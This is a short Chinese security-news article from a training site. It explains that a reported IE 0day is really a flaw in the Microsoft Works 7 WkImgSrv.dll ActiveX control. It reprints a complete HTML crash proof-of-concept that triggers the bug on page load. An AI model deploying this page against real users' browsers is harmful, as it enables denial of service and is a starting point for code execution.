软件开发培训班 >> 网络技术 >> 网络安全

IE 0day漏洞问题出自MS Works

近几天网络上流传着一个传说为IE0DAY的POC代码，在XP系统环境下通杀了IE6和IE7，其它系统并未经过测试。其实这个漏洞并不是存在于IE，而是Microsoft Works的组件被挖掘出漏洞，部分的XP预装了Microsoft Works，所以就出现了过全补丁系统的漏洞（如华硕易PC 就预装了Microsoft Works）。
　　影响的DLL版本：Microsoft Works 7 WkImgSrv.dll （7.03.0616.0）　　以下为crash POC 　　<html>
　　<head>
　　<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
　　<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
　　</script>
　　</head>
　　<body onload=”JavaScript: return payload();”>
　　<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
　　</object>
　　</body>
　　</html>

技术文章快速查找

首度公开 Windows八大保密技巧

Microsoft Internet Explorer FTP含命令注入漏洞

Cisco CallManager CTL Provider 远程堆溢出漏洞

双引擎新趋势 PC-cillin 2007全力出击

Linux 的病毒发展史及分类

Windows Vista操作系统的安全性能剖析

Bing安全：仅是Bing出现搜索引擎中毒吗？

赛门铁克诺顿360测试版试用全体验

在线教程导航

软件应用
·Windows8	·Windows7	·Word
·Excel	·PPT	·WPS
Web开发
·ASP	·JavaScript	·DIV+CSS
·JSP	·VbScript	·XML
·PHP
开发语言
·VB	·VC	·ASP.NET
·Java	·C++	·Delphi
数据库开发
·MySQL	·MsSQL	·Access
·Oracle	·DB2
手机系统
·Android	·iOS	·WindowsPhone
网站设计
·Flash	·Dreamweaver	·Fireworks
平面设计
·Photoshop	·CorelDraw	·AutoCAD
·3DsMAX	·Illustrator
网络技术
·网站运营	·网络安全	·网络搭建

软件开发培训班 >> 网络技术 >> 网络安全

IE 0day漏洞 问题出自MS Works

IE 0day漏洞问题出自MS Works